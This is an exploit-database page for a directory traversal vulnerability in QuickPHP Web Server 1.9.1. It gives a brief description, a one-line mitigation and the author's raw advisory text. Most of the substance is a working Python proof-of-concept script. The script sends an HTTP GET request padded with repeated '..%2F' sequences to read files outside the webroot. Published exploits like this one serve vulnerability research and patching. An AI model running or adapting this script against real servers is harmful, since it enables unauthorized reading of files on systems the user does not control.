header-logo
Suggest Exploit
vendor:
QuickPHP Web Server
by:
John Leitch
6,4
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: QuickPHP Web Server
Affected Version From: 1.9.1
Affected Version To: 1.9.1
Patch Exists: NO
Related CWE: N/A
CPE: a:quickphp:quickphp_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

Directory Traversal in QuickPHP Web Server 1.9.1

A directory traversal vulnerability in QuickPHP Web Server 1.9.1 can be exploited to read files outside of the webroot directory. The resource path must be absolute and the exploit is ..%2F

Mitigation:

Ensure that the resource path is not absolute and is properly validated.
Source

Exploit-DB raw data:

# ------------------------------------------------------------------------

# Software................QuickPHP Web Server 1.9.1

# Vulnerability...........Directory Traversal

# Download................http://www.zachsaw.co.cc/?pg=quickphp_php_tester_debugger

# Release Date............12/27/2010

# Tested On...............Windows XP

# ------------------------------------------------------------------------

# Author..................John Leitch

# Site....................http://www.johnleitch.net/

# Email...................john.leitch5@gmail.com

# ------------------------------------------------------------------------

# 

# --Description--
# 
# A directory traversal vulnerability in QuickPHP Web Server 1.9.1 can
# be exploited to read files outside of the webroot directory.
# 
# 
# --Exploit--
# 
# The resource path must be absolute.
# 
# ..%2F
# 
# 
# --PoC--



import socket

host = 'localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
s.connect((host, port))
s.send('GET http://' + host + '/' + '..%2F' * 8 + ' HTTP/1.1\r\n'
       'Host: ' + host + '\r\n\r\n');

print s.recv(8192);